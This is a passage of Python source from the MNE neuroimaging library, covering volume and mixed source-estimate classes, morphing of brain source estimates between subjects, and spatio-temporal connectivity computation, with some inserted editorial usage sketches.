data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : array
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : array of shape (n_dipoles,)
The indices of the dipoles in the source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
Notes
-----
.. versionadded:: 0.9.0
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not (isinstance(vertices, np.ndarray) or
isinstance(vertices, list) and len(vertices) == 1):
raise ValueError('Vertices must be a numpy array or a list with '
'one array')
_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
@verbose
def save(self, fname, ftype='stc', verbose=None):
"""Save the source estimates to a file
Parameters
----------
fname : string
The stem of the file name. The stem is extended with "-vl.stc"
or "-vl.w".
ftype : string
File format to use. Allowed values are "stc" (default) and "w".
The "w" format only supports a single time point.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
if ftype not in ['stc', 'w']:
raise ValueError('ftype must be "stc" or "w", not "%s"' % ftype)
if ftype == 'stc':
logger.info('Writing STC to disk...')
if not (fname.endswith('-vl.stc') or fname.endswith('-vol.stc')):
fname += '-vl.stc'
_write_stc(fname, tmin=self.tmin, tstep=self.tstep,
vertices=self.vertices, data=self.data)
elif ftype == 'w':
logger.info('Writing STC to disk (w format)...')
if not (fname.endswith('-vl.w') or fname.endswith('-vol.w')):
fname += '-vl.w'
_write_w(fname, vertices=self.vertices, data=self.data)
logger.info('[done]')
def save_as_volume(self, fname, src, dest='mri', mri_resolution=False):
"""Save a volume source estimate in a nifti file
Parameters
----------
fname : string
The name of the generated nifti file.
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
        mri_resolution : bool
            If True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
        img : instance of Nifti1Image
The image object.
Notes
-----
.. versionadded:: 0.9.0
"""
save_stc_as_volume(fname, self, src, dest=dest,
mri_resolution=mri_resolution)
def as_volume(self, src, dest='mri', mri_resolution=False):
"""Export volume source estimate as a nifti object
Parameters
----------
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
        mri_resolution : bool
            If True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
        img : instance of Nifti1Image
The image object.
Notes
-----
.. versionadded:: 0.9.0
"""
return save_stc_as_volume(None, self, src, dest=dest,
mri_resolution=mri_resolution)
def __repr__(self):
if isinstance(self.vertices, list):
nv = sum([len(v) for v in self.vertices])
else:
nv = self.vertices.size
s = "%d vertices" % nv
if self.subject is not None:
s += ", subject : %s" % self.subject
s += ", tmin : %s (ms)" % (1e3 * self.tmin)
s += ", tmax : %s (ms)" % (1e3 * self.times[-1])
s += ", tstep : %s (ms)" % (1e3 * self.tstep)
s += ", data size : %s x %s" % self.shape
return "<VolSourceEstimate | %s>" % s
def get_peak(self, tmin=None, tmax=None, mode='abs',
vert_as_index=False, time_as_index=False):
"""Get location and latency of peak amplitude
Parameters
----------
tmin : float | None
The minimum point in time to be considered for peak getting.
tmax : float | None
The maximum point in time to be considered for peak getting.
mode : {'pos', 'neg', 'abs'}
How to deal with the sign of the data. If 'pos' only positive
values will be considered. If 'neg' only negative values will
be considered. If 'abs' absolute values will be considered.
Defaults to 'abs'.
vert_as_index : bool
            Whether to return the vertex index instead of its ID.
Defaults to False.
time_as_index : bool
Whether to return the time index instead of the latency.
Defaults to False.
Returns
-------
pos : int
The vertex exhibiting the maximum response, either ID or index.
latency : float
The latency in seconds.
"""
vert_idx, time_idx = _get_peak(self.data, self.times, tmin, tmax,
mode)
return (vert_idx if vert_as_index else self.vertices[vert_idx],
time_idx if time_as_index else self.times[time_idx])
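# Editorial usage sketch (added by the editor, not part of the original
# module): assuming `vol_stc` is a VolSourceEstimate and `src` the matching
# single volume source space, the estimate can be written as an .stc file and
# exported as a NIfTI image. The file stem is a placeholder and nibabel must
# be installed for the NIfTI export.
def _example_export_volume_estimate(vol_stc, src):
    vol_stc.save('example-vol')  # extended to 'example-vol-vl.stc'
    img = vol_stc.as_volume(src, dest='mri', mri_resolution=False)
    return img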
class MixedSourceEstimate(_BaseSourceEstimate):
"""Container for mixed surface and volume source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : list of arrays
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : list of arrays of shape (n_dipoles,)
The indices of the dipoles in each source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
Notes
-----
.. versionadded:: 0.9.0
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not isinstance(vertices, list) or len(vertices) < 2:
raise ValueError('Vertices must be a list of numpy arrays with '
'one array per source space.')
_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
def plot_surface(self, src, subject=None, surface='inflated', hemi='lh',
colormap='auto', time_label='time=%02.f ms',
smoothing_steps=10,
transparent=None, alpha=1.0, time_viewer=False,
config_opts={}, subjects_dir=None, figure=None,
views='lat', colorbar=True, clim='auto'):
"""Plot surface source estimates with PySurfer
Note: PySurfer currently needs the SUBJECTS_DIR environment variable,
which will automatically be set by this function. Plotting multiple
SourceEstimates with different values for subjects_dir will cause
PySurfer to use the wrong FreeSurfer surfaces when using methods of
the returned Brain object. It is therefore recommended to set the
SUBJECTS_DIR environment variable or always use the same value for
subjects_dir (within the same Python session).
Parameters
----------
src : SourceSpaces
The source spaces to plot.
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None stc.subject will be used. If that
is None, the environment will be used.
surface : str
The type of surface (inflated, white etc.).
hemi : str, 'lh' | 'rh' | 'split' | 'both'
The hemisphere to display. Using 'both' or 'split' requires
PySurfer version 0.4 or above.
colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)
Name of colormap to use. See `plot_source_estimates`.
time_label : str
How to print info about the time instant visualized.
smoothing_steps : int
The amount of smoothing.
transparent : bool | None
If True, use a linear transparency between fmin and fmid.
None will choose automatically based on colormap type.
alpha : float
Alpha value to apply globally to the overlay.
time_viewer : bool
Display time viewer GUI.
config_opts : dict
Keyword arguments for Brain initialization.
See pysurfer.viz.Brain.
subjects_dir : str
The path to the FreeSurfer subjects reconstructions.
It corresponds to FreeSurfer environment variable SUBJECTS_DIR.
figure : instance of mayavi.core.scene.Scene | None
If None, the last figure will be cleaned and a new figure will
be created.
views : str | list
View to use. See surfer.Brain().
colorbar : bool
If True, display colorbar on scene.
clim : str | dict
Colorbar properties specification. See `plot_source_estimates`.
Returns
-------
brain : Brain
            An instance of surfer.viz.Brain from PySurfer.
"""
# extract surface source spaces
surf = _ensure_src(src, kind='surf')
# extract surface source estimate
data = self.data[:surf[0]['nuse'] + surf[1]['nuse']]
vertices = [s['vertno'] for s in surf]
stc = SourceEstimate(data, vertices, self.tmin, self.tstep,
self.subject, self.verbose)
return plot_source_estimates(stc, subject, surface=surface, hemi=hemi,
colormap=colormap, time_label=time_label,
smoothing_steps=smoothing_steps,
transparent=transparent, alpha=alpha,
time_viewer=time_viewer,
config_opts=config_opts,
subjects_dir=subjects_dir, figure=figure,
views=views, colorbar=colorbar, clim=clim)
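# Editorial usage sketch (added by the editor, not part of the original
# module): for a MixedSourceEstimate `mixed_stc` computed from the mixed
# source space `src`, only the surface part can be visualized; both names are
# assumed inputs and PySurfer must be available.
def _example_plot_mixed_surface(mixed_stc, src):
    return mixed_stc.plot_surface(src, hemi='both', views='lat')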
###############################################################################
# Morphing
@verbose
def _morph_buffer(data, idx_use, e, smooth, n_vertices, nearest, maps,
warn=True, verbose=None):
"""Morph data from one subject's source space to another
Parameters
----------
data : array, or csr sparse matrix
A n_vertices x n_times (or other dimension) dataset to morph.
idx_use : array of int
Vertices from the original subject's data.
e : sparse matrix
The mesh edges of the "from" subject.
smooth : int
Number of smoothing iterations to perform. A hard limit of 100 is
also imposed.
n_vertices : int
Number of vertices.
nearest : array of int
Vertices on the destination surface to use.
maps : sparse matrix
Morph map from one subject to the other.
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
data_morphed : array, or csr sparse matrix
The morphed data (same type as input).
"""
n_iter = 99 # max nb of smoothing iterations (minus one)
if smooth is not None:
if smooth <= 0:
raise ValueError('The number of smoothing operations ("smooth") '
'has to be at least 1.')
smooth -= 1
# make sure we're in CSR format
e = e.tocsr()
if sparse.issparse(data):
use_sparse = True
if not isinstance(data, sparse.csr_matrix):
data = data.tocsr()
else:
use_sparse = False
done = False
# do the smoothing
for k in range(n_iter + 1):
# get the row sum
mult = np.zeros(e.shape[1])
mult[idx_use] = 1
idx_use_data = idx_use
data_sum = e * mult
# new indices are non-zero sums
idx_use = np.where(data_sum)[0]
# typically want to make the next iteration have these indices
idx_out = idx_use
# figure out if this is the last iteration
if smooth is None:
if k == n_iter or len(idx_use) >= n_vertices:
# stop when vertices filled
idx_out = None
done = True
elif k == smooth:
idx_out = None
done = True
# do standard smoothing multiplication
data = _morph_mult(data, e, use_sparse, idx_use_data, idx_out)
if done is True:
break
# do standard normalization
if use_sparse:
data.data /= data_sum[idx_use].repeat(np.diff(data.indptr))
else:
data /= data_sum[idx_use][:, None]
# do special normalization for last iteration
if use_sparse:
data_sum[data_sum == 0] = 1
data.data /= data_sum.repeat(np.diff(data.indptr))
else:
data[idx_use, :] /= data_sum[idx_use][:, None]
if len(idx_use) != len(data_sum) and warn:
warnings.warn('%s/%s vertices not included in smoothing, consider '
'increasing the number of steps'
% (len(data_sum) - len(idx_use), len(data_sum)))
logger.info(' %d smooth iterations done.' % (k + 1))
data_morphed = maps[nearest, :] * data
return data_morphed
def _morph_mult(data, e, use_sparse, idx_use_data, idx_use_out=None):
"""Helper for morphing
Equivalent to "data = (e[:, idx_use_data] * data)[idx_use_out]"
but faster.
"""
if len(idx_use_data) < e.shape[1]:
if use_sparse:
data = e[:, idx_use_data] * data
else:
# constructing a new sparse matrix is faster than sub-indexing
# e[:, idx_use_data]!
col, row = np.meshgrid(np.arange(data.shape[1]), idx_use_data)
d_sparse = sparse.csr_matrix((data.ravel(),
(row.ravel(), col.ravel())),
shape=(e.shape[1], data.shape[1]))
data = e * d_sparse
data = np.asarray(data.todense())
else:
data = e * data
# trim data
if idx_use_out is not None:
data = data[idx_use_out]
return data
def _get_subject_sphere_tris(subject, subjects_dir):
spheres = [os.path.join(subjects_dir, subject, 'surf',
xh + '.sphere.reg') for xh in ['lh', 'rh']]
tris = [read_surface(s)[1] for s in spheres]
return tris
def _sparse_argmax_nnz_row(csr_mat):
"""Return index of the maximum non-zero index in each row
"""
n_rows = csr_mat.shape[0]
idx = np.empty(n_rows, dtype=np.int)
for k in range(n_rows):
row = csr_mat[k].tocoo()
idx[k] = row.col[np.argmax(row.data)]
return idx
def _morph_sparse(stc, subject_from, subject_to, subjects_dir=None):
"""Morph sparse source estimates to an other subject
Parameters
----------
stc : SourceEstimate
The sparse STC.
subject_from : str
The subject on which stc is defined.
subject_to : str
The target subject.
subjects_dir : str
Path to SUBJECTS_DIR if it is not set in the environment.
Returns
-------
stc_morph : SourceEstimate
The morphed source estimates.
"""
maps = read_morph_map(subject_to, subject_from, subjects_dir)
stc_morph = stc.copy()
stc_morph.subject = subject_to
cnt = 0
for k, hemi in enumerate(['lh', 'rh']):
if stc.vertices[k].size > 0:
map_hemi = maps[k]
vertno_k = _sparse_argmax_nnz_row(map_hemi[stc.vertices[k]])
order = np.argsort(vertno_k)
n_active_hemi = len(vertno_k)
data_hemi = stc_morph._data[cnt:cnt + n_active_hemi]
stc_morph._data[cnt:cnt + n_active_hemi] = data_hemi[order]
stc_morph.vertices[k] = vertno_k[order]
cnt += n_active_hemi
else:
stc_morph.vertices[k] = np.array([], int)
return stc_morph
@verbose
def morph_data(subject_from, subject_to, stc_from, grade=5, smooth=None,
subjects_dir=None, buffer_size=64, n_jobs=1, warn=True,
verbose=None):
"""Morph a source estimate from one subject to another
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
stc_from : SourceEstimate
Source estimates for subject "from" to morph
grade : int, list (of two arrays), or None
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
        then values will be morphed to the set of vertices specified
        in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
buffer_size : int
Morph data in chunks of `buffer_size` time instants.
Saves memory when morphing long time intervals.
n_jobs : int
Number of jobs to run in parallel
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
if not isinstance(stc_from, SourceEstimate):
raise ValueError('Morphing is only possible with surface source '
'estimates')
logger.info('Morphing data...')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
nearest = grade_to_vertices(subject_to, grade, subjects_dir, n_jobs)
tris = _get_subject_sphere_tris(subject_from, subjects_dir)
maps = read_morph_map(subject_from, subject_to, subjects_dir)
# morph the data
data = [stc_from.lh_data, stc_from.rh_data]
data_morphed = [None, None]
n_chunks = ceil(stc_from.data.shape[1] / float(buffer_size))
parallel, my_morph_buffer, _ = parallel_func(_morph_buffer, n_jobs)
for hemi in [0, 1]:
e = mesh_edges(tris[hemi])
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = stc_from.vertices[hemi]
if len(idx_use) == 0:
continue
data_morphed[hemi] = np.concatenate(
parallel(my_morph_buffer(data_buffer, idx_use, e, smooth,
n_vertices, nearest[hemi], maps[hemi],
warn=warn)
for data_buffer
in np.array_split(data[hemi], n_chunks, axis=1)), axis=1)
vertices = [nearest[0], nearest[1]]
if data_morphed[0] is None:
if data_morphed[1] is None:
data = np.r_[[], []]
vertices = [np.array([], int), np.array([], int)]
else:
data = data_morphed[1]
vertices = [np.array([], int), vertices[1]]
elif data_morphed[1] is None:
data = data_morphed[0]
vertices = [vertices[0], np.array([], int)]
else:
data = np.r_[data_morphed[0], data_morphed[1]]
stc_to = SourceEstimate(data, vertices, stc_from.tmin, stc_from.tstep,
subject=subject_to, verbose=stc_from.verbose)
logger.info('[done]')
return stc_to
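# Editorial usage sketch (added by the editor, not part of the original
# module): morphing a surface SourceEstimate between subjects. The subject
# names 'sample' and 'fsaverage' are placeholders that must exist in
# SUBJECTS_DIR, and `stc_sample` is an assumed input.
def _example_morph_data(stc_sample, subjects_dir=None):
    return morph_data('sample', 'fsaverage', stc_sample, grade=5,
                      smooth=None, subjects_dir=subjects_dir, n_jobs=1)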
@verbose
def compute_morph_matrix(subject_from, subject_to, vertices_from, vertices_to,
smooth=None, subjects_dir=None, warn=True,
verbose=None):
"""Get a matrix that morphs data from one subject to another
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
vertices_from : list of arrays of int
Vertices for each hemisphere (LH, RH) for subject_from
vertices_to : list of arrays of int
Vertices for each hemisphere (LH, RH) for subject_to
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string
        Path to SUBJECTS_DIR if it is not set in the environment
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
morph_matrix : sparse matrix
matrix that morphs data from subject_from to subject_to
"""
logger.info('Computing morph matrix...')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
tris = _get_subject_sphere_tris(subject_from, subjects_dir)
maps = read_morph_map(subject_from, subject_to, subjects_dir)
morpher = [None] * 2
for hemi in [0, 1]:
e = mesh_edges(tris[hemi])
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = vertices_from[hemi]
if len(idx_use) == 0:
morpher[hemi] = []
continue
m = sparse.eye(len(idx_use), len(idx_use), format='csr')
morpher[hemi] = _morph_buffer(m, idx_use, e, smooth, n_vertices,
vertices_to[hemi], maps[hemi], warn=warn)
# be careful about zero-length arrays
if isinstance(morpher[0], list):
morpher = morpher[1]
elif isinstance(morpher[1], list):
morpher = morpher[0]
else:
morpher = sparse_block_diag(morpher, format='csr')
logger.info('[done]')
return morpher
@verbose
def grade_to_vertices(subject, grade, subjects_dir=None, n_jobs=1,
verbose=None):
"""Convert a grade to source space vertices for a given subject
Parameters
----------
subject : str
Name of the subject
    grade : int, list (of two arrays), or None
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
        then values will be morphed to the set of vertices specified
        in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment
n_jobs : int
Number of jobs to run in parallel
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
vertices : list of arrays of int
Vertex numbers for LH and RH
"""
# add special case for fsaverage for speed
if subject == 'fsaverage' and grade == 5:
return [np.arange(10242), np.arange(10242)]
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
spheres_to = [os.path.join(subjects_dir, subject, 'surf',
xh + '.sphere.reg') for xh in ['lh', 'rh']]
lhs, rhs = [read_surface(s)[0] for s in spheres_to]
if grade is not None: # fill a subset of vertices
if isinstance(grade, list):
if not len(grade) == 2:
raise ValueError('grade as a list must have two elements '
'(arrays of output vertices)')
vertices = grade
else:
# find which vertices to use in "to mesh"
ico = _get_ico_tris(grade, return_surf=True)
lhs /= np.sqrt(np.sum(lhs ** 2, axis=1))[:, None]
rhs /= np.sqrt(np.sum(rhs ** 2, axis=1))[:, None]
# Compute nearest vertices in high dim mesh
parallel, my_compute_nearest, _ = \
parallel_func(_compute_nearest, n_jobs)
lhs, rhs, rr = [a.astype(np.float32)
for a in [lhs, rhs, ico['rr']]]
vertices = parallel(my_compute_nearest(xhs, rr)
for xhs in [lhs, rhs])
# Make sure the vertices are ordered
vertices = [np.sort(verts) for verts in vertices]
else: # potentially fill the surface
vertices = [np.arange(lhs.shape[0]), np.arange(rhs.shape[0])]
return vertices
def morph_data_precomputed(subject_from, subject_to, stc_from, vertices_to,
morph_mat):
"""Morph source estimate between subjects using a precomputed matrix
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR.
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR.
stc_from : SourceEstimate
Source estimates for subject "from" to morph.
vertices_to : list of array of int
The vertices on the destination subject's brain.
morph_mat : sparse matrix
The morphing matrix, typically from compute_morph_matrix.
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
if not sparse.issparse(morph_mat):
raise ValueError('morph_mat must be a sparse matrix')
if not isinstance(vertices_to, list) or not len(vertices_to) == 2:
raise ValueError('vertices_to must be a list of length 2')
if not sum(len(v) for v in vertices_to) == morph_mat.shape[0]:
raise ValueError('number of vertices in vertices_to must match '
'morph_mat.shape[0]')
if not stc_from.data.shape[0] == morph_mat.shape[1]:
raise ValueError('stc_from.data.shape[0] must be the same as '
                         'morph_mat.shape[1]')
if stc_from.subject is not None and stc_from.subject != subject_from:
raise ValueError('stc_from.subject and subject_from must match')
data = morph_mat * stc_from.data
stc_to = SourceEstimate(data, vertices_to, stc_from.tmin, stc_from.tstep,
verbose=stc_from.verbose, subject=subject_to)
return stc_to
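# Editorial usage sketch (added by the editor, not part of the original
# module): when many estimates share the same morph, precomputing the morph
# matrix once is typically cheaper than repeated calls to morph_data. Subject
# names are placeholders; `stc_from` is an assumed input.
def _example_precomputed_morph(stc_from, subjects_dir=None):
    vertices_to = grade_to_vertices('fsaverage', 5, subjects_dir=subjects_dir)
    morph_mat = compute_morph_matrix('sample', 'fsaverage',
                                     stc_from.vertices, vertices_to,
                                     subjects_dir=subjects_dir)
    return morph_data_precomputed('sample', 'fsaverage', stc_from,
                                  vertices_to, morph_mat)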
@verbose
def spatio_temporal_src_connectivity(src, n_times, dist=None, verbose=None):
"""Compute connectivity for a source space activation over time
Parameters
----------
src : instance of SourceSpaces
The source space.
n_times : int
Number of time instants.
dist : float, or None
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors. If None, immediate neighbors
are extracted from an ico surface.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
        source space, the first N nodes in the graph are the
        vertices at time 1, the nodes from N+1 to 2N are the vertices
        at time 2, etc.
"""
if dist is None:
if src[0]['use_tris'] is None:
raise RuntimeError("The source space does not appear to be an ico "
"surface. Connectivity cannot be extracted from"
" non-ico source spaces.")
used_verts = [np.unique(s['use_tris']) for s in src]
lh_tris = np.searchsorted(used_verts[0], src[0]['use_tris'])
rh_tris = np.searchsorted(used_verts[1], src[1]['use_tris'])
tris = np.concatenate((lh_tris, rh_tris + np.max(lh_tris) + 1))
connectivity = spatio_temporal_tris_connectivity(tris, n_times)
# deal with source space only using a subset of vertices
masks = [in1d(u, s['vertno']) for s, u in zip(src, used_verts)]
if sum(u.size for u in used_verts) != connectivity.shape[0] / n_times:
raise ValueError('Used vertices do not match connectivity shape')
if [np.sum(m) for m in masks] != [len(s['vertno']) for s in src]:
raise ValueError('Vertex mask does not match number of vertices')
masks = np.concatenate(masks)
missing = 100 * float(len(masks) - np.sum(masks)) / len(masks)
if missing:
warnings.warn('%0.1f%% of original source space vertices have been'
' omitted, tri-based connectivity will have holes.\n'
'Consider using distance-based connectivity or '
'morphing data to all source space vertices.'
% missing)
masks = np.tile(masks, n_times)
masks = np.where(masks)[0]
connectivity = connectivity.tocsr()
connectivity = connectivity[masks]
connectivity = connectivity[:, masks]
# return to original format
connectivity = connectivity.tocoo()
return connectivity
else: # use distances computed and saved in the source space file
return spatio_temporal_dist_connectivity(src, n_times, dist)
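# Editorial usage sketch (added by the editor, not part of the original
# module): building the spatio-temporal adjacency used for cluster-level
# statistics. `src` is assumed to be an ico surface source space and `stc` a
# matching SourceEstimate.
def _example_src_connectivity(src, stc):
    n_times = stc.data.shape[1]
    return spatio_temporal_src_connectivity(src, n_times)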
@verbose
def grade_to_tris(grade, verbose=None):
"""Get tris defined for a certain grade
Parameters
----------
grade : int
Grade of an icosahedral mesh.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
tris : list
2-element list containing Nx3 arrays of tris, suitable for use in
spatio_temporal_tris_connectivity.
"""
a = _get_ico_tris(grade, None, False)
tris = np.concatenate((a, a + (np.max(a) + 1)))
return tris
@verbose
def spatio_temporal_tris_connectivity(tris, n_times, remap_vertices=False,
verbose=None):
"""Compute connectivity from triangles and time instants
Parameters
----------
tris : array
N x 3 array defining triangles.
n_times : int
Number of time points
remap_vertices : bool
Reassign vertex indices based on unique values. Useful
to process a subset of triangles. Defaults to False.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
        source space, the first N nodes in the graph are the
        vertices at time 1, the nodes from N+1 to 2N are the vertices
        at time 2, etc.
"""
if remap_vertices:
logger.info('Reassigning vertex indices.')
tris = np.searchsorted(np.unique(tris), tris)
edges = mesh_edges(tris).tocoo()
return _get_connectivity_from_edges(edges, n_times)
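# Editorial usage sketch (added by the editor, not part of the original
# module): for data defined on a full grade-5 icosahedral mesh (both
# hemispheres, e.g. after morphing to fsaverage with grade=5), the
# triangle-based connectivity can be built directly from grade_to_tris.
def _example_tris_connectivity(n_times):
    tris = grade_to_tris(5)
    return spatio_temporal_tris_connectivity(tris, n_times)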
@verbose
def spatio_temporal_dist_connectivity(src, n_times, dist, verbose=None):
"""Compute connectivity from distances in a source space and time instants
Parameters
----------
src : instance of SourceSpaces
The source space must have distances between vertices computed, such
that src['dist'] exists and is useful. This can be obtained using MNE
with a call to mne_add_patch_info with the --dist option.
n_times : int
Number of time points
dist : float
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
        source space, the first N nodes in the graph are the
        vertices at time 1, the nodes from N+1 to 2N are the vertices
        at time 2, etc.
"""
if src[0]['dist'] is None:
raise RuntimeError('src must have distances included, consider using\n'
'mne_add_patch_info with --dist argument')
edges = sparse_block_diag([s['dist'][s['vertno'], :][:, s['vertno']]
for s in src])
edges.data[:] = np.less_equal(edges.data, dist)
# clean it up and put it in coo format
edges = edges.tocsr()
edges.eliminate_zeros()
edges = edges.tocoo()
return _get_connectivity_from_edges(edges, n_times)
@verbose
def spatial_src_connectivity(src, dist=None, verbose=None):
"""Compute connectivity for a source space activation
Parameters
----------
src : instance of SourceSpaces
The source space.
dist : float, or None
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors. If None, immediate neighbors
are extracted from an ico surface.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_src_connectivity(src, 1, dist)
@verbose
def spatial_tris_connectivity(tris, remap_vertices=False, verbose=None):
"""Compute connectivity from triangles
Parameters
----------
tris : array
N x 3 array defining triangles.
remap_vertices : bool
Reassign vertex indices based on unique values. Useful
to process a subset of triangles. Defaults to False.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_tris_connectivity(tris, 1, remap_vertices)
def spatial_dist_connectivity(src, dist, verbose=None):
"""Compute connectivity from distances in a source space
Parameters
----------
src : instance of SourceSpaces
The source space must have distances between vertices computed, such
that src['dist'] exists and is useful. This can be obtained using MNE
with a call to mne_add_patch_info with the --dist option.
dist : float
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_dist_connectivity(src, 1, dist)
def spatial_inter_hemi_connectivity(src, dist, verbose=None):
"""Get vertices on each hemisphere that are close to the other hemisphere
Parameters
----------
src : instance of SourceSpaces
The source space. Must be surface type.
dist : float
Maximal Euclidean distance (in m) between vertices in one hemisphere
compared to the other to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
        Typically this should be combined (additively) with another
existing intra-hemispheric connectivity matrix, e.g. computed
using geodesic distances.
"""
from scipy.spatial.distance import cdist
src = _ensure_src(src, kind='surf')
conn = cdist(src[0]['rr'][src[0]['vertno']],
src[1]['rr'][src[1]['vertno']])
conn = sparse.csr_matrix(conn <= dist, dtype=int)
empties = [sparse.csr_matrix((nv, nv), dtype=int) for nv in conn.shape]
conn = sparse.vstack([sparse.hstack([empties[0], conn]),
sparse.hstack([conn.T, empties[1]])])
return conn
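# Editorial usage sketch (added by the editor, not part of the original
# module): combining the intra-hemispheric connectivity with
# inter-hemispheric neighbors closer than 5 mm; the distance value is purely
# illustrative and `src` is an assumed surface source space.
def _example_combined_connectivity(src):
    intra = spatial_src_connectivity(src)
    inter = spatial_inter_hemi_connectivity(src, dist=0.005)
    return (intra + inter).tocoo()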
@verbose
def _get_connectivity_from_edges(edges, n_times, verbose=None):
"""Given edges sparse matrix, create connectivity matrix"""
n_vertices = edges.shape[0]
